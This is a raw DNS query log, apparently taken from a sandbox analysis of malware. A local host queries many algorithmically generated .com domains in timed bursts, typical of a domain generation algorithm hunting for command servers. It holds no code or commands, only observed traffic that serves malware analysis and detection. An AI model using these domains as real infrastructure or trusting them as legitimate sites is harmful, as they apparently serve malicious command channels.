                                                                                                                                                                                                              Aug 23, 2024 18:47:00.573564053 CEST192.168.2.41.1.1.10x40dfStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.573795080 CEST192.168.2.41.1.1.10x8c58Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.573945045 CEST192.168.2.41.1.1.10x7af4Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.574074030 CEST192.168.2.41.1.1.10xa0f6Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.576349974 CEST192.168.2.41.1.1.10x1584Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.576349974 CEST192.168.2.41.1.1.10x1357Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.576476097 CEST192.168.2.41.1.1.10x1747Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.576623917 CEST192.168.2.41.1.1.10x3e79Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.576761961 CEST192.168.2.41.1.1.10x34fdStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.584600925 CEST192.168.2.41.1.1.10x3b6bStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.584781885 CEST192.168.2.41.1.1.10x436eStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.584914923 CEST192.168.2.41.1.1.10x9cf7Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.585066080 CEST192.168.2.41.1.1.10xb4d1Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.585199118 CEST192.168.2.41.1.1.10x5dd7Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.585330009 CEST192.168.2.41.1.1.10xedc7Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.589301109 CEST192.168.2.41.1.1.10xe940Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.589488983 CEST192.168.2.41.1.1.10xd26dStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.589852095 CEST192.168.2.41.1.1.10x99c1Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.590068102 CEST192.168.2.41.1.1.10xa1d9Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.590224981 CEST192.168.2.41.1.1.10xe237Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10x409aStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10x3fa9Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10xd5dfStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10x5f09Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10x8d7cStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10xd65bStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10xc854Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597352982 CEST192.168.2.41.1.1.10x935Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597385883 CEST192.168.2.41.1.1.10xf32bStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597385883 CEST192.168.2.41.1.1.10x7823Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597385883 CEST192.168.2.41.1.1.10x4333Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597385883 CEST192.168.2.41.1.1.10xdb7fStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597385883 CEST192.168.2.41.1.1.10xbed0Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.597771883 CEST192.168.2.41.1.1.10xa32fStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.673631907 CEST192.168.2.41.1.1.10x8fb6Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.702395916 CEST192.168.2.41.1.1.10xfd58Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.743846893 CEST192.168.2.41.1.1.10x4eadStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.791019917 CEST192.168.2.41.1.1.10xaf97Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.791327000 CEST192.168.2.41.1.1.10x4eabStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.884243011 CEST192.168.2.41.1.1.10x9600Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.928443909 CEST192.168.2.41.1.1.10xe2cStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.970068932 CEST192.168.2.41.1.1.10xec36Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.974291086 CEST192.168.2.41.1.1.10x7209Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.985197067 CEST192.168.2.41.1.1.10x8a78Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.035147905 CEST192.168.2.41.1.1.10x633eStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.090102911 CEST192.168.2.41.1.1.10xbc1eStandard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.559772015 CEST192.168.2.41.1.1.10x1feeStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.610568047 CEST192.168.2.41.1.1.10x227cStandard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.078334093 CEST192.168.2.41.1.1.10x2d7cStandard query (0)ww3.galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.146552086 CEST192.168.2.41.1.1.10x1ca7Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.211019993 CEST192.168.2.41.1.1.10xa326Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.211019993 CEST192.168.2.41.1.1.10x9a0aStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.212702990 CEST192.168.2.41.1.1.10x9e7dStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.212796926 CEST192.168.2.41.1.1.10x67a1Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.214354038 CEST192.168.2.41.1.1.10xead2Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.214385986 CEST192.168.2.41.1.1.10x7b3bStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.215609074 CEST192.168.2.41.1.1.10xb36aStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.216459990 CEST192.168.2.41.1.1.10x8158Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.217149973 CEST192.168.2.41.1.1.10xd1d1Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.218575001 CEST192.168.2.41.1.1.10x1df4Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.218575001 CEST192.168.2.41.1.1.10xd2dbStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.219878912 CEST192.168.2.41.1.1.10x9ac0Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.220655918 CEST192.168.2.41.1.1.10x19a8Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.221476078 CEST192.168.2.41.1.1.10xf257Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.222445011 CEST192.168.2.41.1.1.10xe69bStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.223102093 CEST192.168.2.41.1.1.10xc028Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.224071026 CEST192.168.2.41.1.1.10x7205Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.224922895 CEST192.168.2.41.1.1.10x473bStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.225919962 CEST192.168.2.41.1.1.10xbd67Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.226670027 CEST192.168.2.41.1.1.10xfe6eStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.227267027 CEST192.168.2.41.1.1.10xfcabStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.228311062 CEST192.168.2.41.1.1.10x4d22Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.228789091 CEST192.168.2.41.1.1.10x6a59Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.230052948 CEST192.168.2.41.1.1.10x5378Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.230232000 CEST192.168.2.41.1.1.10x7f6bStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.231522083 CEST192.168.2.41.1.1.10xeeb1Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.232445955 CEST192.168.2.41.1.1.10xcdb2Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.234213114 CEST192.168.2.41.1.1.10x6637Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.245600939 CEST192.168.2.41.1.1.10x97f0Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.264031887 CEST192.168.2.41.1.1.10x682aStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.268459082 CEST192.168.2.41.1.1.10xcd54Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.271925926 CEST192.168.2.41.1.1.10x20e7Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.295398951 CEST192.168.2.41.1.1.10x6b34Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.297291040 CEST192.168.2.41.1.1.10x1ab4Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.297569036 CEST192.168.2.41.1.1.10x5d94Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.297732115 CEST192.168.2.41.1.1.10x6ae3Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.297748089 CEST192.168.2.41.1.1.10x12bdStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.297895908 CEST192.168.2.41.1.1.10xe86dStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.298021078 CEST192.168.2.41.1.1.10x2fecStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.298145056 CEST192.168.2.41.1.1.10x88ebStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.298271894 CEST192.168.2.41.1.1.10x113bStandard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.298397064 CEST192.168.2.41.1.1.10x52b0Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.298526049 CEST192.168.2.41.1.1.10x4b4fStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.299036026 CEST192.168.2.41.1.1.10x2389Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.299638033 CEST192.168.2.41.1.1.10xe666Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.299901962 CEST192.168.2.41.1.1.10x19aaStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.300096989 CEST192.168.2.41.1.1.10x5068Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.300174952 CEST192.168.2.41.1.1.10x1f62Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.300460100 CEST192.168.2.41.1.1.10xcccaStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.300642014 CEST192.168.2.41.1.1.10x40ecStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.300699949 CEST192.168.2.41.1.1.10xece0Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.300853014 CEST192.168.2.41.1.1.10x6e53Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.301517010 CEST192.168.2.41.1.1.10x7e10Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.313364029 CEST192.168.2.41.1.1.10xb435Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.313474894 CEST192.168.2.41.1.1.10x26acStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.313565969 CEST192.168.2.41.1.1.10x746aStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.313602924 CEST192.168.2.41.1.1.10xe4d9Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.313771009 CEST192.168.2.41.1.1.10x81efStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.313807964 CEST192.168.2.41.1.1.10xab81Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.314841032 CEST192.168.2.41.1.1.10x17b9Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.315097094 CEST192.168.2.41.1.1.10x782bStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.315403938 CEST192.168.2.41.1.1.10xcaaaStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.316096067 CEST192.168.2.41.1.1.10xe361Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.317920923 CEST192.168.2.41.1.1.10x3858Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.340816021 CEST192.168.2.41.1.1.10x4bebStandard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.364289999 CEST192.168.2.41.1.1.10xa1f9Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.563935041 CEST192.168.2.41.1.1.10x5ea0Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.843209982 CEST192.168.2.41.1.1.10xefc2Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.808643103 CEST192.168.2.41.1.1.10x27cbStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.833857059 CEST192.168.2.41.1.1.10xbd4Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.836477041 CEST192.168.2.41.1.1.10xece0Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.000771046 CEST192.168.2.41.1.1.10x81b2Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.004936934 CEST192.168.2.41.1.1.10x74d2Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.012491941 CEST192.168.2.41.1.1.10x5461Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.019927979 CEST192.168.2.41.1.1.10x14c1Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.023184061 CEST192.168.2.41.1.1.10x882cStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.026655912 CEST192.168.2.41.1.1.10x734fStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.031167984 CEST192.168.2.41.1.1.10xa936Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.038714886 CEST192.168.2.41.1.1.10x9af1Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.045559883 CEST192.168.2.41.1.1.10xb965Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.059571981 CEST192.168.2.41.1.1.10x4e0Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060077906 CEST192.168.2.41.1.1.10xc6deStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060336113 CEST192.168.2.41.1.1.10xe74cStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060741901 CEST192.168.2.41.1.1.10x505Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060915947 CEST192.168.2.41.1.1.10x5597Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.104377985 CEST192.168.2.41.1.1.10xb9dStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.108556032 CEST192.168.2.41.1.1.10xe465Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.108760118 CEST192.168.2.41.1.1.10x4f2fStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.108916044 CEST192.168.2.41.1.1.10xf65bStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.109421015 CEST192.168.2.41.1.1.10xfe1aStandard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.124967098 CEST192.168.2.41.1.1.10x3f05Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.125277996 CEST192.168.2.41.1.1.10x562eStandard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187253952 CEST192.168.2.41.1.1.10x3536Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187491894 CEST192.168.2.41.1.1.10x4358Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187745094 CEST192.168.2.41.1.1.10x7434Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187889099 CEST192.168.2.41.1.1.10xb593Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.188288927 CEST192.168.2.41.1.1.10xb823Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.188438892 CEST192.168.2.41.1.1.10xea78Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.188750982 CEST192.168.2.41.1.1.10xcecbStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189007044 CEST192.168.2.41.1.1.10x8aa0Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189224005 CEST192.168.2.41.1.1.10x86cStandard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189615965 CEST192.168.2.41.1.1.10xacb1Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189893961 CEST192.168.2.41.1.1.10xbf16Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.191452026 CEST192.168.2.41.1.1.10x2e0Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.191848040 CEST192.168.2.41.1.1.10x2ecbStandard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.192034960 CEST192.168.2.41.1.1.10x7ee7Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.192424059 CEST192.168.2.41.1.1.10xd061Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.192869902 CEST192.168.2.41.1.1.10xc979Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.193074942 CEST192.168.2.41.1.1.10x8b5cStandard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.221111059 CEST192.168.2.41.1.1.10x5486Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.221991062 CEST192.168.2.41.1.1.10xf1a4Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.222311974 CEST192.168.2.41.1.1.10x33Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.222528934 CEST192.168.2.41.1.1.10x1265Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.223839998 CEST192.168.2.41.1.1.10x5073Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224143982 CEST192.168.2.41.1.1.10xaf83Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224522114 CEST192.168.2.41.1.1.10x17feStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224689007 CEST192.168.2.41.1.1.10xf77eStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224859953 CEST192.168.2.41.1.1.10x2268Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.225245953 CEST192.168.2.41.1.1.10x6bacStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.225471973 CEST192.168.2.41.1.1.10x86c8Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.225682020 CEST192.168.2.41.1.1.10xdec0Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.276566029 CEST192.168.2.41.1.1.10xfadStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.276770115 CEST192.168.2.41.1.1.10x543cStandard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.276941061 CEST192.168.2.41.1.1.10x8064Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.277412891 CEST192.168.2.41.1.1.10xa27bStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.279663086 CEST192.168.2.41.1.1.10x31ccStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.282016039 CEST192.168.2.41.1.1.10x9343Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283670902 CEST192.168.2.41.1.1.10x88b1Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283701897 CEST192.168.2.41.1.1.10xc419Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283900023 CEST192.168.2.41.1.1.10xe5b3Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283932924 CEST192.168.2.41.1.1.10x6b2aStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
